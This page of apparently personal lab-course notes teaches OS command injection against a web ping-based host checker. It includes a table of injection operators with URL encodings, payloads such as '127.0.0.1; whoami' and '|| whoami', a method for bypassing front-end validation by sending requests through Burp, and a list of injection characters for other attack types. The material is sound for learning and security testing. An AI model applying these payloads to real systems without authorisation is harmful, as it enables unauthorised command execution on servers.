🥚Exploitation

Command Injection Detection

Let's imagine a host checker 👍

If we eneter our localhost it pings it and tells us if the host is alive:

We can easily imagine that the backend does something like that:

ping -c 1 OUR_INPUT

Here are some important operators for command injection:

Injection Operator

Injection Character

URL-Encoded Character

Executed Command

Semicolon

;

%3b

Both

New Line

%0a

Both

Background

&

%26

Both (second output generally shown first)

Pipe

|

%7c

Both (only second output is shown)

AND

&&

%26%26

Both (only if first succeeds)

OR

||

%7c%7c

Second (only if first fails)

Sub-Shell

``

%60%60

Both (Linux-only)

Sub-Shell

$()

%24%28%29

Both (Linux-only)

To lead a successful command injection We would write our expected input (e.g., an IP), then use any of the above operators, and then write our new command.

We can imagine an injection like this with a semicolon to escape the intended functionnality:

ping -c 1 127.0.0.1; whoami

Let's see in our terminal if it works:

But on the web app it refuses our input

So we open the network tab and click again on the check button:

no new network requests were made when we clicked on the Check button, yet we got an error message. This indicates that the user input validation is happening on the front-end.

front-end validations are usually not enough to prevent injections, as they can be very easily bypassed by sending custom HTTP requests directly to the back-end.

Bypassing Front-End Validation

Send to burp and input the payload there:

We could also play around with other operators ->

ping -c 1 127.0.0.1 && whoami

But if we try inputting the OR operator:

ping -c 1 127.0.0.1 || whoami

It will pass but will not exec the whoami since the first command returns exit code 0 indicating successful execution so it would only attempt to execute the other command if the first command failed and returned an exit code 1.

So we can try breaking the original input:

ping -c 1 || whoami

In our terminal it does not work but if we input || whoami in burp:

Here is a list of such operators:

Injection Type

Operators

SQL Injection

' , ; -- /* */

Command Injection

; &&

LDAP Injection

* ( ) & |

XPath Injection

' or and not substring concat count

OS Command Injection

; & |

Code Injection

' ; -- /* */ $() ${} #{} %{} ^

Directory Traversal/File Path Traversal

../ ..\\ %00

Object Injection

; & |

XQuery Injection

' ; -- /* */

Shellcode Injection

\x \u %u %n

Header Injection

\r %0d %0a %09

Try using the remaining three injection operators (new-line, &, |), and see how each works and how the output differs. Which of them only shows the output of the injected command?

PreviousCommand InjectionsNextFilter Evasion

Last updated